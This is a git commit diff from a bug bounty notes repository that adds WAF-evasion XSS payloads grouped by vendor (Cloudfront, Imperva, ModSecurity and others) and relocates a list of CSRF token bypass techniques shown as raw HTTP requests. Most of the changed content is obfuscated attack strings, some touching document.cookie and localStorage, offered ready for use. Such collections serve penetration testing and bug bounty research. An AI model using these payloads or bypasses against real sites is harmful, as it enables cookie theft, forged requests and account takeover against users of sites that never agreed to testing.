feat: added XSS payloads to bypass WAF

2022-11-08 18:29:04 +07:00 · 2022-11-08 18:29:04 +07:00 · 4f51606813
parent 5c6916174a
commit 4f51606813
5 changed files with 207 additions and 171 deletions
--- a/Bypass/Bypass
+++ b/Bypass/Bypass
@ -1,30 +0,0 @@
 # Bypass 304 (Not Modified)
 1. Delete "If-None-Match" header
 ```
 GET /admin HTTP/1.1
 Host: target.com
 If-None-Match: W/"32-IuK7rSIJ92ka0c92kld"
 ```
 Try this to bypass
 ```
 GET /admin HTTP/1.1
 Host: target.com
 ```
 2. Adding random character in the end of "If-None-Match" header
 ```
 GET /admin HTTP/1.1
 Host: target.com
 If-None-Match: W/"32-IuK7rSIJ92ka0c92kld"
 ```
 Try this to bypass
 ```
 GET /admin HTTP/1.1
 Host: target.com
 Host: target.com
 If-None-Match: W/"32-IuK7rSIJ92ka0c92kld" b
 ```
 ## References
 * [https://anggigunawan17.medium.com/tips-bypass-etag-if-none-match-e1f0e650a521](https://anggigunawan17.medium.com/tips-bypass-etag-if-none-match-e1f0e650a521)
--- a/Bypass/Bypass
+++ b/Bypass/Bypass
@ -1,120 +0,0 @@
 # Bypass CSRF
 1. Change single character
 ```
 POST /register HTTP/1.1
 Host: target.com
 ...
 username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
 ```
 Try this to bypass
 ```
 POST /register HTTP/1.1
 Host: target.com
 ...
 username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaab
 ```
 2. Sending empty value of token
 ```
 POST /register HTTP/1.1
 Host: target.com
 ...
 username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
 ```
 Try this to bypass
 ```
 POST /register HTTP/1.1
 Host: target.com
 ...
 username=dapos&password=123456&token=
 ```
 3. Replace the token with same length
 ```
 POST /register HTTP/1.1
 Host: target.com
 ...
 username=dapos&password=123456&token=aaaaaa
 ```
 Try this to bypass
 ```
 POST /register HTTP/1.1
 Host: target.com
 ...
 username=dapos&password=123456&token=aaabaa
 ```
 4. Changing POST / GET method
 ```
 POST /register HTTP/1.1
 Host: target.com
 ...
 username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
 ```
 Try this to bypass
 ```
 GET /register?username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa HTTP/1.1
 Host: target.com
 ...
 ```
 5. Remove the token from request
 ```
 POST /register HTTP/1.1
 Host: target.com
 ...
 username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
 ```
 Try this to bypass
 ```
 POST /register HTTP/1.1
 Host: target.com
 ...
 username=dapos&password=123456
 ```
 6. Use another user's valid token
 ```
 POST /register HTTP/1.1
 Host: target.com
 ...
 username=dapos&password=123456&token=ANOTHER_VALID_TOKEN
 ```
 7. Try to decrypt hash
 ```
 POST /register HTTP/1.1
 Host: target.com
 ...
 username=dapos&password=123456&token=MTIzNDU2
 ```
 MTIzNDU2 => 123456 with base64
 8. Sometimes anti-CSRF token is composed by 2 parts, one of them remains static while the others one dynamic
 ```
 POST /register HTTP/1.1
 Host: target.com
 ...
 username=dapos&password=123456&token=vi802jg9f8akd9j123
 ```
 When we register again, the request like this
 ```
 POST /register HTTP/1.1
 Host: target.com
 ...
 username=dapos&password=123456&token=vi802jg9f8akd9j124
 ```
 If you notice "vi802jg9f8akd9j" part of the token remain same, you just need to send with only static part
--- a/Forgery.md
+++ b/Forgery.md
@ -4,7 +4,7 @@
 Cross-Site Request Forgery (CSRF/XSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated
 ## Where to find
-Usually found in forms. Try submit the form and check the HTTP request. If the HTTP request does not have a CSRF token then it is likely to be vulnerable to a CSRF attack. But in some cases, the CSRF token can be bypassed, try check this [List](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20CSRF.md)
+Usually found in forms. Try submit the form and check the HTTP request. If the HTTP request does not have a CSRF token then it is likely to be vulnerable to a CSRF attack.
 ## How to exploit
 1. HTML GET Method
@ -93,3 +93,125 @@ xhr.send('{"role":admin}');
 <br>
 </body>
 ```
 # Bypass CSRF Token
 But in some cases, even though there is a CSRF token on the form on the website. CSRF tokens can still be bypassed by doing a few things:
 1. Change single character
 ```
 POST /register HTTP/1.1
 Host: target.com
 ...
 username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
 ```
 Try this to bypass
 ```
 POST /register HTTP/1.1
 Host: target.com
 ...
 username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaab
 ```
 2. Sending empty value of token
 ```
 POST /register HTTP/1.1
 Host: target.com
 ...
 username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
 ```
 Try this to bypass
 ```
 POST /register HTTP/1.1
 Host: target.com
 ...
 username=dapos&password=123456&token=
 ```
 3. Replace the token with same length
 ```
 POST /register HTTP/1.1
 Host: target.com
 ...
 username=dapos&password=123456&token=aaaaaa
 ```
 Try this to bypass
 ```
 POST /register HTTP/1.1
 Host: target.com
 ...
 username=dapos&password=123456&token=aaabaa
 ```
 4. Changing POST / GET method
 ```
 POST /register HTTP/1.1
 Host: target.com
 ...
 username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
 ```
 Try this to bypass
 ```
 GET /register?username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa HTTP/1.1
 Host: target.com
 ...
 ```
 5. Remove the token from request
 ```
 POST /register HTTP/1.1
 Host: target.com
 ...
 username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
 ```
 Try this to bypass
 ```
 POST /register HTTP/1.1
 Host: target.com
 ...
 username=dapos&password=123456
 ```
 6. Use another user's valid token
 ```
 POST /register HTTP/1.1
 Host: target.com
 ...
 username=dapos&password=123456&token=ANOTHER_VALID_TOKEN
 ```
 7. Try to decrypt hash
 ```
 POST /register HTTP/1.1
 Host: target.com
 ...
 username=dapos&password=123456&token=MTIzNDU2
 ```
 MTIzNDU2 => 123456 with base64
 8. Sometimes anti-CSRF token is composed by 2 parts, one of them remains static while the others one dynamic
 ```
 POST /register HTTP/1.1
 Host: target.com
 ...
 username=dapos&password=123456&token=vi802jg9f8akd9j123
 ```
 When we register again, the request like this
 ```
 POST /register HTTP/1.1
 Host: target.com
 ...
 username=dapos&password=123456&token=vi802jg9f8akd9j124
 ```
 If you notice "vi802jg9f8akd9j" part of the token remain same, you just need to send with only static part
--- a/Scripting.md
+++ b/Scripting.md
@ -344,31 +344,22 @@ javascript://%250Aalert(1)
 ```
 <svg%0Aonauxclick=0;[1].some(confirm)//
-<svg onload=alert%26%230000000040"")>
+<svg/onload={alert`1`}>
 <a/href=j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;&lpar;a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;(1)&rpar;>
 <svg onx=() onload=(confirm)(1)>
 <svg onx=() onload=(confirm)(document.cookie)>
 <svg onx=() onload=(confirm)(JSON.stringify(localStorage))>
 Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();
 "><img%20src=x%20onmouseover=prompt%26%2300000000000000000040;document.cookie%26%2300000000000000000041;
 Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();
 "><onx=[] onmouseover=prompt(1)>
-%2sscript%2ualert()%2s/script%2u -xss popup
+%2sscript%2ualert()%2s/script%2u
 <svg onload=alert%26%230000000040"1")>
 "Onx=() onMouSeoVer=prompt(1)>"Onx=[] onMouSeoVer=prompt(1)>"/*/Onx=""//onfocus=prompt(1)>"//Onx=""/*/%01onfocus=prompt(1)>"%01onClick=prompt(1)>"%2501onclick=prompt(1)>"onClick="(prompt)(1)"Onclick="(prompt(1))"OnCliCk="(prompt`1`)"Onclick="([1].map(confirm))
 [1].map(confirm)'ale'+'rt'()a&Tab;l&Tab;e&Tab;r&Tab;t(1)prompt&lpar;1&rpar;prompt&#40;1&#41;prompt%26%2300000000000000000040;1%26%2300000000000000000041;(prompt())(prompt``)
 <svg onload=alert%26%230000000040"1")>
 <svg onload=prompt%26%230000000040document.domain)>
 <svg onload=prompt%26%23x000000028;document.domain)>
@ -379,11 +370,84 @@ Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();
 <a id=x tabindex=1 onbeforedeactivate=print(`XSS`)></a><input autofocus>
 <img ignored=() src=x onerror=prompt(1)>
 <svg onx=() onload=(confirm)(1)>
 <--`<img/src=` onerror=confirm``> --!>
 <img src=x onerror="a=()=>{c=0;for(i in self){if(/^a[rel]+t$/.test(i)){return c}c++}};self[Object.keys(self)[a()]](document.domain)">
 <j id=x style="-webkit-user-modify:read-write" onfocus={window.onerror=eval}throw/0/+name>H</j>#x
 '"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
 '"><img/src/onerror=.1|alert``>
 :javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie
-<img ignored=() src=x onerror=prompt(1)>
+Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();
 ```
 2. Cloudfront
 ```
 ">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x onerror=javascript:alert(`cloudfrontbypass`)//'>
 <--`<img%2fsrc%3d` onerror%3dalert(document.domain)> --!>
 "><--<img+src= "><svg/onload+alert(document.domain)>> --!>
 ```
 3. Cloudbric
 ```
 <a69/onclick=[1].findIndex(alert)>pew
 ```
 4. Comodo WAF
 ```
 <input/oninput='new Function`confir\u006d\`0\``'>
 <p/ondragstart=%27confirm(0)%27.replace(/.+/,eval)%20draggable=True>dragme
 ```
 5. ModSecurity
 ```
 <a href="jav%0Dascript&colon;alert(1)">
 ```
 6. Imperva
 ```
 <input id='a'value='global'><input id='b'value='E'><input 'id='c'value='val'><input id='d'value='aler'><input id='e'value='t(documen'><input id='f'value='t.domain)'><svg+onload[\r\n]=$[a.value+b.value+c.value](d.value+e.value+f.value)>
 <x/onclick=globalThis&lsqb;'\u0070r\u006f'+'mpt']&lt;)>clickme
 <a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click
 <a69/onclick=write&lpar;&rpar;>pew
 <details/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%2b'rt'];throw/**/self['doc'%2b'ument']['domain'];"/open>
 <svg onload\r\n=$.globalEval("al"+"ert()");>
 <svg/onload=self[`aler`%2b`t`]`1`>
 %3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D%22prom%5Cu0070t%2526%2523x28%3B%2526%2523x27%3B%2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B%2526%2523x27%3B%2526%2523x29%3B%22%3E
 <iframe/onload='this["src"]="javas&Tab;cript:al"+"ert``"';>
 <img/src=q onerror='new Function`al\ert\`1\``'>
 <object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
 ```
 7. AWS
 ```
 <script>eval(atob(decodeURIComponent(confirm`1`)))</script>
 ```
 If you want to see the other payload for other WAF, check this [link](https://github.com/0xInfection/Awesome-WAF)
 ## References
 - [Brute Logic](https://brutelogic.com.br/)
 - [Awesome-WAF](https://github.com/0xInfection/Awesome-WAF)
 - Some random twitter posts
--- a/README.md
+++ b/README.md
@ -22,7 +22,9 @@ These are my bug bounty notes that I have gathered from various sources, you can
 - [OAuth Misconfiguration](https://github.com/daffainfo/AllAboutBugBounty/blob/master/OAuth%20Misconfiguration.md)
 - [Open Redirect](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Open%20Redirect.md)
 - [Remote File Inclusion (RFI)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Remote%20File%20Inclusion.md)
 - [Server Side Request Forgery](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Server%20Side%20Request%20Forgery.md)
 - SQL Injection (SOON)
 - [Web Cache Deception](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Web%20Cache%20Deception.md)
 - [Web Cache Poisoning](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Web%20Cache%20Poisoning.md)
 ## Checklist
@ -32,10 +34,8 @@ These are my bug bounty notes that I have gathered from various sources, you can
 ## List Bypass
 - [Bypass 2FA](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%202FA.md)
 - [Bypass 403](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20403.md)
 - [Bypass 304](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20304.md)
 - [Bypass 429](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20429.md)
 - [Bypass Captcha](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20Captcha.md)
 - [Bypass CSRF](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20CSRF.md)
 ## Miscellaneous
 - [Account Takeover](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Account%20Takeover.md)
@ -50,11 +50,11 @@ These are my bug bounty notes that I have gathered from various sources, you can
 - [Confluence](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Confluence.md)
 - [Grafana](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Grafana.md)
 - [HAProxy](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/HAProxy.md)
 - [Jenkins](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jenkins.md)
 - [Jira](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jira.md)
 - [Joomla](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Joomla.md)
 - [Jenkins](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jenkins.md)
 - [Moodle](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Moodle.md)
 - [Laravel](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Laravel.md)
 - [Moodle](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Moodle.md)
 - [Nginx](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Nginx.md)
 - [WordPress](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/WordPress.md)
 - [Zend](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Zend.md)
@ -69,5 +69,5 @@ These are my bug bounty notes that I have gathered from various sources, you can
 - [ ] Tidy up the reconnaisance folder
 - [ ] Seperate the bypass from some vulnerability readme
 - [ ] Writes multiple payload bypasses for each vulnerability
-  - [ ] Payload XSS for each WAF (Cloudflare, Cloudfront, AWS, etc)
+  - [x] Payload XSS for each WAF (Cloudflare, Cloudfront, AWS, etc)
  - [ ] Payload SQL injection for each WAF (Cloudflare, Cloudfront)